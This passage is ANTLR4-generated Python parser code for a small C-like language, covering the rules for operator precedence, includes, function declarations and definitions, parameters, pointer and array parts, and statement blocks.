self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,8,self._ctx)
if la_ == 1:
localctx = SmallCParser.Oplevel4Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel4)
self.state = 187
if not self.precpred(self._ctx, 3):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
self.state = 188
self.match(SmallCParser.T__9)
self.state = 189
self.oplevel3(0)
pass
elif la_ == 2:
localctx = SmallCParser.Oplevel4Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel4)
self.state = 190
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 191
self.match(SmallCParser.T__10)
self.state = 192
self.oplevel3(0)
pass
self.state = 197
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,9,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Oplevel3Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel2(self):
return self.getTypedRuleContext(SmallCParser.Oplevel2Context,0)
def oplevel3(self):
return self.getTypedRuleContext(SmallCParser.Oplevel3Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel3
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel3" ):
listener.enterOplevel3(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel3" ):
listener.exitOplevel3(self)
def oplevel3(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = SmallCParser.Oplevel3Context(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 24
self.enterRecursionRule(localctx, 24, self.RULE_oplevel3, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 199
self.oplevel2()
self._ctx.stop = self._input.LT(-1)
self.state = 212
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,11,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 210
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,10,self._ctx)
if la_ == 1:
localctx = SmallCParser.Oplevel3Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel3)
self.state = 201
if not self.precpred(self._ctx, 4):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 4)")
self.state = 202
self.match(SmallCParser.T__11)
self.state = 203
self.oplevel2()
pass
elif la_ == 2:
localctx = SmallCParser.Oplevel3Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel3)
self.state = 204
if not self.precpred(self._ctx, 3):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
self.state = 205
self.match(SmallCParser.T__12)
self.state = 206
self.oplevel2()
pass
elif la_ == 3:
localctx = SmallCParser.Oplevel3Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel3)
self.state = 207
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 208
self.match(SmallCParser.T__13)
self.state = 209
self.oplevel2()
pass
self.state = 214
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,11,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Oplevel2Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def oplevel2(self):
return self.getTypedRuleContext(SmallCParser.Oplevel2Context,0)
def oplevel1(self):
return self.getTypedRuleContext(SmallCParser.Oplevel1Context,0)
def functionCall(self):
return self.getTypedRuleContext(SmallCParser.FunctionCallContext,0)
def LBRA(self):
return self.getToken(SmallCParser.LBRA, 0)
def typeDeclaration(self):
return self.getTypedRuleContext(SmallCParser.TypeDeclarationContext,0)
def RBRA(self):
return self.getToken(SmallCParser.RBRA, 0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel2
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel2" ):
listener.enterOplevel2(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel2" ):
listener.exitOplevel2(self)
def oplevel2(self):
localctx = SmallCParser.Oplevel2Context(self, self._ctx, self.state)
self.enterRule(localctx, 26, self.RULE_oplevel2)
try:
self.state = 236
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,12,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 215
self.match(SmallCParser.T__14)
self.state = 216
self.oplevel2()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 217
self.match(SmallCParser.T__15)
self.state = 218
self.oplevel2()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 219
self.match(SmallCParser.T__9)
self.state = 220
self.oplevel2()
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 221
self.match(SmallCParser.T__10)
self.state = 222
self.oplevel2()
pass
elif la_ == 5:
self.enterOuterAlt(localctx, 5)
self.state = 223
self.match(SmallCParser.T__16)
self.state = 224
self.oplevel1(0)
pass
elif la_ == 6:
self.enterOuterAlt(localctx, 6)
self.state = 225
self.match(SmallCParser.T__11)
self.state = 226
self.oplevel2()
pass
elif la_ == 7:
self.enterOuterAlt(localctx, 7)
self.state = 227
self.match(SmallCParser.T__17)
self.state = 228
self.oplevel2()
pass
elif la_ == 8:
self.enterOuterAlt(localctx, 8)
self.state = 229
self.functionCall()
pass
elif la_ == 9:
self.enterOuterAlt(localctx, 9)
self.state = 230
self.match(SmallCParser.LBRA)
self.state = 231
self.typeDeclaration()
self.state = 232
self.match(SmallCParser.RBRA)
self.state = 233
self.oplevel2()
pass
elif la_ == 10:
self.enterOuterAlt(localctx, 10)
self.state = 235
self.oplevel1(0)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Oplevel1Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def variable(self):
return self.getTypedRuleContext(SmallCParser.VariableContext,0)
def floatLiteral(self):
return self.getTypedRuleContext(SmallCParser.FloatLiteralContext,0)
def integerLiteral(self):
return self.getTypedRuleContext(SmallCParser.IntegerLiteralContext,0)
def characterLiteral(self):
return self.getTypedRuleContext(SmallCParser.CharacterLiteralContext,0)
def stringLiteral(self):
return self.getTypedRuleContext(SmallCParser.StringLiteralContext,0)
def expression(self):
return self.getTypedRuleContext(SmallCParser.ExpressionContext,0)
def oplevel1(self):
return self.getTypedRuleContext(SmallCParser.Oplevel1Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_oplevel1
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOplevel1" ):
listener.enterOplevel1(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOplevel1" ):
listener.exitOplevel1(self)
def oplevel1(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = SmallCParser.Oplevel1Context(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 28
self.enterRecursionRule(localctx, 28, self.RULE_oplevel1, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 248
token = self._input.LA(1)
if token in [SmallCParser.IDENTIFIER]:
self.state = 239
self.variable()
elif token in [SmallCParser.FLOAT]:
self.state = 240
self.floatLiteral()
elif token in [SmallCParser.INTEGER]:
self.state = 241
self.integerLiteral()
elif token in [SmallCParser.CHARACTER]:
self.state = 242
self.characterLiteral()
elif token in [SmallCParser.STRING]:
self.state = 243
self.stringLiteral()
elif token in [SmallCParser.LBRA]:
self.state = 244
self.match(SmallCParser.LBRA)
self.state = 245
self.expression()
self.state = 246
self.match(SmallCParser.RBRA)
else:
raise NoViableAltException(self)
self._ctx.stop = self._input.LT(-1)
self.state = 261
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,15,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 259
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,14,self._ctx)
if la_ == 1:
localctx = SmallCParser.Oplevel1Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel1)
self.state = 250
if not self.precpred(self._ctx, 9):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 9)")
self.state = 251
self.match(SmallCParser.T__14)
pass
elif la_ == 2:
localctx = SmallCParser.Oplevel1Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel1)
self.state = 252
if not self.precpred(self._ctx, 8):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 8)")
self.state = 253
self.match(SmallCParser.T__15)
pass
elif la_ == 3:
localctx = SmallCParser.Oplevel1Context(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel1)
self.state = 254
if not self.precpred(self._ctx, 7):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 7)")
self.state = 255
self.match(SmallCParser.LSBRA)
self.state = 256
self.expression()
self.state = 257
self.match(SmallCParser.RSBRA)
pass
self.state = 263
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,15,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class ProgramContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def include(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.IncludeContext)
else:
return self.getTypedRuleContext(SmallCParser.IncludeContext,i)
def functionDeclaration(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.FunctionDeclarationContext)
else:
return self.getTypedRuleContext(SmallCParser.FunctionDeclarationContext,i)
def functionDefinition(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.FunctionDefinitionContext)
else:
return self.getTypedRuleContext(SmallCParser.FunctionDefinitionContext,i)
def variableDeclaration(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.VariableDeclarationContext)
else:
return self.getTypedRuleContext(SmallCParser.VariableDeclarationContext,i)
def getRuleIndex(self):
return SmallCParser.RULE_program
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterProgram" ):
listener.enterProgram(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitProgram" ):
listener.exitProgram(self)
def program(self):
localctx = SmallCParser.ProgramContext(self, self._ctx, self.state)
self.enterRule(localctx, 30, self.RULE_program)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 272
self._errHandler.sync(self)
_la = self._input.LA(1)
while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.T__19) | (1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST))) != 0):
self.state = 270
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,16,self._ctx)
if la_ == 1:
self.state = 264
self.include()
pass
elif la_ == 2:
self.state = 265
self.functionDeclaration()
pass
elif la_ == 3:
self.state = 266
self.functionDefinition()
pass
elif la_ == 4:
self.state = 267
self.variableDeclaration()
self.state = 268
self.match(SmallCParser.T__18)
pass
self.state = 274
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class IncludeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def LABRA(self):
return self.getToken(SmallCParser.LABRA, 0)
def stdInclude(self):
return self.getTypedRuleContext(SmallCParser.StdIncludeContext,0)
def RABRA(self):
return self.getToken(SmallCParser.RABRA, 0)
def customInclude(self):
return self.getTypedRuleContext(SmallCParser.CustomIncludeContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_include
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInclude" ):
listener.enterInclude(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInclude" ):
listener.exitInclude(self)
def include(self):
localctx = SmallCParser.IncludeContext(self, self._ctx, self.state)
self.enterRule(localctx, 32, self.RULE_include)
try:
self.state = 282
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,18,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 275
self.match(SmallCParser.T__19)
self.state = 276
self.match(SmallCParser.LABRA)
self.state = 277
self.stdInclude()
self.state = 278
self.match(SmallCParser.RABRA)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 280
self.match(SmallCParser.T__19)
self.state = 281
self.customInclude()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class StdIncludeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def identifier(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.IdentifierContext)
else:
return self.getTypedRuleContext(SmallCParser.IdentifierContext,i)
def getRuleIndex(self):
return SmallCParser.RULE_stdInclude
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterStdInclude" ):
listener.enterStdInclude(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitStdInclude" ):
listener.exitStdInclude(self)
def stdInclude(self):
localctx = SmallCParser.StdIncludeContext(self, self._ctx, self.state)
self.enterRule(localctx, 34, self.RULE_stdInclude)
try:
self.enterOuterAlt(localctx, 1)
self.state = 284
self.identifier()
self.state = 285
self.match(SmallCParser.T__20)
self.state = 286
self.identifier()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class CustomIncludeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def stringLiteral(self):
return self.getTypedRuleContext(SmallCParser.StringLiteralContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_customInclude
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCustomInclude" ):
listener.enterCustomInclude(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCustomInclude" ):
listener.exitCustomInclude(self)
def customInclude(self):
localctx = SmallCParser.CustomIncludeContext(self, self._ctx, self.state)
self.enterRule(localctx, 36, self.RULE_customInclude)
try:
self.enterOuterAlt(localctx, 1)
self.state = 288
self.stringLiteral()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class FunctionDeclarationContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def identifier(self):
return self.getTypedRuleContext(SmallCParser.IdentifierContext,0)
def LBRA(self):
return self.getToken(SmallCParser.LBRA, 0)
def parameters(self):
return self.getTypedRuleContext(SmallCParser.ParametersContext,0)
def RBRA(self):
return self.getToken(SmallCParser.RBRA, 0)
def declarationSpecifier(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.DeclarationSpecifierContext)
else:
return self.getTypedRuleContext(SmallCParser.DeclarationSpecifierContext,i)
def pointerPart(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.PointerPartContext)
else:
return self.getTypedRuleContext(SmallCParser.PointerPartContext,i)
def getRuleIndex(self):
return SmallCParser.RULE_functionDeclaration
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFunctionDeclaration" ):
listener.enterFunctionDeclaration(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFunctionDeclaration" ):
listener.exitFunctionDeclaration(self)
def functionDeclaration(self):
localctx = SmallCParser.FunctionDeclarationContext(self, self._ctx, self.state)
self.enterRule(localctx, 38, self.RULE_functionDeclaration)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 291
self._errHandler.sync(self)
_la = self._input.LA(1)
while True:
self.state = 290
self.declarationSpecifier()
self.state = 293
self._errHandler.sync(self)
_la = self._input.LA(1)
if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST))) != 0)):
break
self.state = 298
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==SmallCParser.T__11:
self.state = 295
self.pointerPart()
self.state = 300
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 301
self.identifier()
self.state = 302
self.match(SmallCParser.LBRA)
self.state = 303
self.parameters()
self.state = 304
self.match(SmallCParser.RBRA)
self.state = 305
self.match(SmallCParser.T__18)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class FunctionDefinitionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def identifier(self):
return self.getTypedRuleContext(SmallCParser.IdentifierContext,0)
def LBRA(self):
return self.getToken(SmallCParser.LBRA, 0)
def parameters(self):
return self.getTypedRuleContext(SmallCParser.ParametersContext,0)
def RBRA(self):
return self.getToken(SmallCParser.RBRA, 0)
def statements(self):
return self.getTypedRuleContext(SmallCParser.StatementsContext,0)
def declarationSpecifier(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.DeclarationSpecifierContext)
else:
return self.getTypedRuleContext(SmallCParser.DeclarationSpecifierContext,i)
def pointerPart(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.PointerPartContext)
else:
return self.getTypedRuleContext(SmallCParser.PointerPartContext,i)
def getRuleIndex(self):
return SmallCParser.RULE_functionDefinition
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFunctionDefinition" ):
listener.enterFunctionDefinition(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFunctionDefinition" ):
listener.exitFunctionDefinition(self)
def functionDefinition(self):
localctx = SmallCParser.FunctionDefinitionContext(self, self._ctx, self.state)
self.enterRule(localctx, 40, self.RULE_functionDefinition)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 308
self._errHandler.sync(self)
_la = self._input.LA(1)
while True:
self.state = 307
self.declarationSpecifier()
self.state = 310
self._errHandler.sync(self)
_la = self._input.LA(1)
if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST))) != 0)):
break
self.state = 315
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==SmallCParser.T__11:
self.state = 312
self.pointerPart()
self.state = 317
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 318
self.identifier()
self.state = 319
self.match(SmallCParser.LBRA)
self.state = 320
self.parameters()
self.state = 321
self.match(SmallCParser.RBRA)
self.state = 322
self.statements()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ParametersContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def parameter(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.ParameterContext)
else:
return self.getTypedRuleContext(SmallCParser.ParameterContext,i)
def getRuleIndex(self):
return SmallCParser.RULE_parameters
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterParameters" ):
listener.enterParameters(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitParameters" ):
listener.exitParameters(self)
def parameters(self):
localctx = SmallCParser.ParametersContext(self, self._ctx, self.state)
self.enterRule(localctx, 42, self.RULE_parameters)
self._la = 0 # Token type
try:
self.state = 334
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,24,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 325
self.parameter()
self.state = 330
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==SmallCParser.COMMA:
self.state = 326
self.match(SmallCParser.COMMA)
self.state = 327
self.parameter()
self.state = 332
self._errHandler.sync(self)
_la = self._input.LA(1)
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ParameterContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def declarationSpecifier(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.DeclarationSpecifierContext)
else:
return self.getTypedRuleContext(SmallCParser.DeclarationSpecifierContext,i)
def pointerPart(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.PointerPartContext)
else:
return self.getTypedRuleContext(SmallCParser.PointerPartContext,i)
def identifier(self):
return self.getTypedRuleContext(SmallCParser.IdentifierContext,0)
def arrayPart(self):
return self.getTypedRuleContext(SmallCParser.ArrayPartContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_parameter
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterParameter" ):
listener.enterParameter(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitParameter" ):
listener.exitParameter(self)
def parameter(self):
localctx = SmallCParser.ParameterContext(self, self._ctx, self.state)
self.enterRule(localctx, 44, self.RULE_parameter)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 337
self._errHandler.sync(self)
_la = self._input.LA(1)
while True:
self.state = 336
self.declarationSpecifier()
self.state = 339
self._errHandler.sync(self)
_la = self._input.LA(1)
if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST))) != 0)):
break
self.state = 344
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==SmallCParser.T__11:
self.state = 341
self.pointerPart()
self.state = 346
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 348
_la = self._input.LA(1)
if _la==SmallCParser.IDENTIFIER:
self.state = 347
self.identifier()
self.state = 351
_la = self._input.LA(1)
if _la==SmallCParser.LSBRA:
self.state = 350
self.arrayPart()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class PointerPartContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def pointer(self):
return self.getTypedRuleContext(SmallCParser.PointerContext,0)
def cvQualifier(self):
return self.getTypedRuleContext(SmallCParser.CvQualifierContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_pointerPart
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterPointerPart" ):
listener.enterPointerPart(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitPointerPart" ):
listener.exitPointerPart(self)
def pointerPart(self):
localctx = SmallCParser.PointerPartContext(self, self._ctx, self.state)
self.enterRule(localctx, 46, self.RULE_pointerPart)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 353
self.pointer()
self.state = 355
_la = self._input.LA(1)
if _la==SmallCParser.CONST:
self.state = 354
self.cvQualifier()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ArrayPartContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def LSBRA(self):
return self.getToken(SmallCParser.LSBRA, 0)
def RSBRA(self):
return self.getToken(SmallCParser.RSBRA, 0)
def expression(self):
return self.getTypedRuleContext(SmallCParser.ExpressionContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_arrayPart
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterArrayPart" ):
listener.enterArrayPart(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitArrayPart" ):
listener.exitArrayPart(self)
def arrayPart(self):
localctx = SmallCParser.ArrayPartContext(self, self._ctx, self.state)
self.enterRule(localctx, 48, self.RULE_arrayPart)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 357
self.match(SmallCParser.LSBRA)
self.state = 359
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.T__9) | (1 << SmallCParser.T__10) | (1 << SmallCParser.T__11) | (1 << SmallCParser.T__14) | (1 << SmallCParser.T__15) | (1 << SmallCParser.T__16) | (1 << SmallCParser.T__17) | (1 << SmallCParser.LBRA) | (1 << SmallCParser.INTEGER) | (1 << SmallCParser.FLOAT) | (1 << SmallCParser.IDENTIFIER) | (1 << SmallCParser.CHARACTER) | (1 << SmallCParser.STRING))) != 0):
self.state = 358
self.expression()
self.state = 361
self.match(SmallCParser.RSBRA)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class StatementsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def LCBRA(self):
return self.getToken(SmallCParser.LCBRA, 0)
def RCBRA(self):
return self.getToken(SmallCParser.RCBRA, 0)
def statement(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.StatementContext)
else:
return self.getTypedRuleContext(SmallCParser.StatementContext,i)
def getRuleIndex(self):
return SmallCParser.RULE_statements
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterStatements" ):
listener.enterStatements(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitStatements" ):
listener.exitStatements(self)
def statements(self):
localctx = SmallCParser.StatementsContext(self, self._ctx, self.state)
self.enterRule(localctx, 50, self.RULE_statements)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 363
self.match(SmallCParser.LCBRA)
self.state = 367
self._errHandler.sync(self)
_la = self._input.LA(1)
while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.T__9) | (1 << SmallCParser.T__10) | (1 << SmallCParser.T__11) | (1 << SmallCParser.T__14) | (1 << SmallCParser.T__15) | (1 << SmallCParser.T__16) | (1 << SmallCParser.T__17) | (1 << SmallCParser.T__18) | (1 << SmallCParser.LBRA) | (1 << SmallCParser.LCBRA) | (1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST) | (1 << SmallCParser.IF) | (1 << SmallCParser.DO) | (1 << SmallCParser.WHILE) | (1 << SmallCParser.FOR) | (1 << SmallCParser.RETURN) | (1 << SmallCParser.INTEGER) | (1 << SmallCParser.FLOAT) | (1 << SmallCParser.IDENTIFIER) | (1 << SmallCParser.CHARACTER) | (1 << SmallCParser.STRING))) != 0):
self.state = 364
self.statement()
self.state = 369
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 370
self.match(SmallCParser.RCBRA)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class StatementContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def statements(self):
return self.getTypedRuleContext(SmallCParser.StatementsContext,0)
def ifCond(self):
return self.getTypedRuleContext(SmallCParser.IfCondContext,0)
def whileCond(self):
return self.getTypedRuleContext(SmallCParser.WhileCondContext,0)
def doWhileCond(self):
return self.getTypedRuleContext(SmallCParser.DoWhileCondContext,0)
def forLoop(self):
return self.getTypedRuleContext(SmallCParser.ForLoopContext,0)
def expression(self):
return self.getTypedRuleContext(SmallCParser.ExpressionContext,0)
def variableDeclaration(self):
return self.getTypedRuleContext(SmallCParser.VariableDeclarationContext,0)
def returnStmt(self):
